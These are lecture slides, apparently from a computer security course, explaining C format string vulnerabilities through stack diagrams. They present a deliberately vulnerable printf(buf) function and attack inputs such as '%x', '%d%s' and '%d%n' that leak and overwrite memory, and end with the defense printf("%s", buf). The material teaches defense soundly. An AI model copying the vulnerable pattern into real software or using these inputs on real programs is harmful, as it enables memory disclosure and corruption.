Review: printf behavior

  • Recall: printf takes a variable number of arguments
    • How does it know how many arguments it received?
    • It infers it from the first argument: the format string!
    • Example: printf("One %s costs %d", fruit, price)
    • What happens if the arguments are mismatched?
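
To illustrate how the argument count is inferred from the format string alone, here is a deliberately simplified sketch. It is not how any real printf is implemented: count_format_args is a hypothetical helper that counts '%' specifiers, treats "%%" as a literal percent sign, and ignores details such as '*' widths.

```c
#include <stddef.h>

/* Counts conversion specifications in fmt: a '%' followed by anything
 * other than another '%'. Simplification: '*' widths, which consume an
 * extra argument in real printf, are not counted. */
size_t count_format_args(const char *fmt) {
    size_t count = 0;
    for (size_t i = 0; fmt[i] != '\0'; i++) {
        if (fmt[i] != '%') {
            continue;
        }
        if (fmt[i + 1] == '%') { /* "%%" prints a literal '%' */
            i++;
            continue;
        }
        if (fmt[i + 1] == '\0') { /* lone trailing '%' */
            break;
        }
        count++;
    }
    return count;
}
```

For "One %s costs %d" this returns 2. Nothing in the count depends on how many arguments the caller actually pushed.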

82 of 94

Review: printf behavior

void func(void) {

int secret = 42;

printf("%d\n", 123);

}

printf assumes that there is one more argument because the format string contains one format specifier, so it looks 4 bytes above its first argument on the stack for that value

What if there is no argument?

...

...

...

...

RIP of func

SFP of func

secret = 42

123 (arg to printf)

&"%d\n"(arg to printf)

RIP of printf

SFP of printf

[printf frame]

Format string in memory: '%' 'd' '\n' '\0'

Figure labels: arg0 is the pointer to the format string, arg1 is 123

83 of 94

Review: printf behavior

void func(void) {

int secret = 42;

printf("%d\n");

}

Because the format string contains the %d, it will still look 4 bytes up and print the value of secret!

...

...

...

...

RIP of func

SFP of func

secret = 42

&"%d\n"(arg to printf)

RIP of printf

SFP of printf

[printf frame]

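Format string in memory: '%' 'd' '\n' '\0'

Figure labels: arg0 is the pointer to the format string, arg1 is the stack slot holding secret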

84 of 94

Format String Vulnerabilities

char buf[64];

void vulnerable(void) {

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

What is the issue here?

85 of 94

Format String Vulnerabilities

  • Now, the attacker can specify any format string they want:
    • printf("100% done!")
      • Prints 4 bytes on the stack, 8 bytes above the RIP of printf
    • printf("100% stopped.")
      • Print the bytes pointed to by the address located 8 bytes above the RIP of printf, until the first NULL byte
    • printf("%x %x %x %x ...")
      • Print a series of values on the stack in hex

char buf[64];

void vulnerable(void) {

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

86 of 94

Format String Vulnerability Walkthrough

Note that strings are passed by reference in C, so the argument to printf is actually a pointer to buf, which is in static memory.

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

buf (in static memory)

secret_string points to: 'p' 'a' 'n' 'c' 'a' 'k' 'e' '\0'

87 of 94

Format String Vulnerability Walkthrough

Input: %d%s

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

We’re calling printf("%d%s"). printf reads its first argument (arg0), sees two format specifiers, and expects two more arguments (arg1 and arg2).

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

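Figure labels: arg0 is &buf, arg1 is secret_number, arg2 is secret_string

buf (in static memory): '%' 'd' '%' 's' '\0'

secret_string points to: 'p' 'a' 'n' 'c' 'a' 'k' 'e' '\0'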

88 of 94

Format String Vulnerability Walkthrough

Input: %d%s

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

42

The first format specifier %d says to treat the next argument (arg1) as an integer and print it out.

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

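Figure labels: arg0 is &buf, arg1 is secret_number, arg2 is secret_string

buf (in static memory): '%' 'd' '%' 's' '\0'

secret_string points to: 'p' 'a' 'n' 'c' 'a' 'k' 'e' '\0'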

89 of 94

Format String Vulnerability Walkthrough

Input: %d%s

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

42pancake

The second format specifier %s says to treat the next argument (arg2) as a string and print it out.

%s will dereference the pointer at arg2 and print until it sees a null byte ('\0')

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

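Figure labels: arg0 is &buf, arg1 is secret_number, arg2 is secret_string

buf (in static memory): '%' 'd' '%' 's' '\0'

secret_string points to: 'p' 'a' 'n' 'c' 'a' 'k' 'e' '\0'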

90 of 94

Format String Vulnerabilities

  • Attackers can also write values using the %n specifier
    • %n treats the next argument as a pointer and writes the number of bytes printed so far to that address (usually used to calculate output spacing)
      • printf("item %d:%n", 3, &val) stores 7 in val
      • printf("item %d:%n", 987, &val) stores 9 in val
    • printf("000%n")
      • Writes the value 3 to the integer pointed to by address located 8 bytes above the RIP of printf
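
The two legitimate %n examples above can be reproduced with snprintf and a constant format string. This is a sketch with a hypothetical function name, label_width. Some C libraries and hardened build configurations restrict or disable %n, so treat it as an illustration of the standard behavior rather than something to rely on.

```c
#include <stdio.h>

/* Formats "item <n>:" into a scratch buffer and returns the number of
 * characters written before the %n specifier was reached. */
int label_width(int item) {
    char out[64];
    int val = -1; /* stays -1 if the library ignores %n */
    snprintf(out, sizeof(out), "item %d:%n", item, &val);
    return val;
}
```

Here the pointer passed for %n is chosen by the programmer. In the attack, the attacker controls the format string, and printf takes the pointer from whatever happens to be on the stack.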

void vulnerable(void) {

char buf[64];

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

91 of 94

Format String Vulnerability Walkthrough

Input: %d%n

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

We’re calling printf("%d%n"). printf reads its first argument (arg0), sees two format specifiers, and expects two more arguments (arg1 and arg2).

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

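Figure labels: arg0 is &buf, arg1 is secret_number, arg2 is secret_string

buf (in static memory): '%' 'd' '%' 'n' '\0'

secret_string points to: 'p' 'a' 'n' 'c' 'a' 'k' 'e' '\0'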

92 of 94

Format String Vulnerability Walkthrough

Input: %d%n

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

42

The first format specifier %d says to treat the next argument (arg1) as an integer and print it out.

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

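Figure labels: arg0 is &buf, arg1 is secret_number, arg2 is secret_string

buf (in static memory): '%' 'd' '%' 'n' '\0'

secret_string points to: 'p' 'a' 'n' 'c' 'a' 'k' 'e' '\0'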

93 of 94

Format String Vulnerability Walkthrough

Input: %d%n

char buf[64];

void vulnerable(void) {

char *secret_string = "pancake";

int secret_number = 42;

if (fgets(buf, 64, stdin) == NULL)

return;

printf(buf);

}

Output:

42

The second format specifier %n says to treat the next argument (arg2) as a pointer, and write the number of bytes printed so far to the address at arg2.

We've printed 2 bytes so far ("42"), so the number 2 gets written to the memory that secret_string points to, overwriting the first four bytes of "pancake".

...

RIP of vulnerable

SFP of vulnerable

secret_string

secret_number

&buf [arg to printf]

RIP of printf

SFP of printf

[printf frame]

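Figure labels: arg0 is &buf, arg1 is secret_number, arg2 is secret_string

buf (in static memory): '%' 'd' '%' 'n' '\0'

secret_string points to: 0x02 0x00 0x00 0x00 'a' 'k' 'e' '\0'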

94 of 94

Format String Vulnerabilities: Defense

void vulnerable(void) {

char buf[64];

if (fgets(buf, 64, stdin) == NULL)

return;

printf("%s", buf);

}

Never use untrusted input in the first argument to printf.

Now the attacker can't make the number of arguments mismatched!
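
The effect of the defense can be checked without a terminal by formatting into a buffer. This is a minimal sketch; format_untrusted is a hypothetical name, and snprintf stands in for printf so the result can be inspected.

```c
#include <stddef.h>
#include <stdio.h>

/* Copies untrusted text into out using a constant format string.
 * The untrusted text is only ever data for %s, never a format string. */
int format_untrusted(char *out, size_t out_size, const char *untrusted) {
    return snprintf(out, out_size, "%s", untrusted);
}
```

Passing the input %d%s%n through this function yields those six characters verbatim: no stack values are read and nothing is written through %n.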
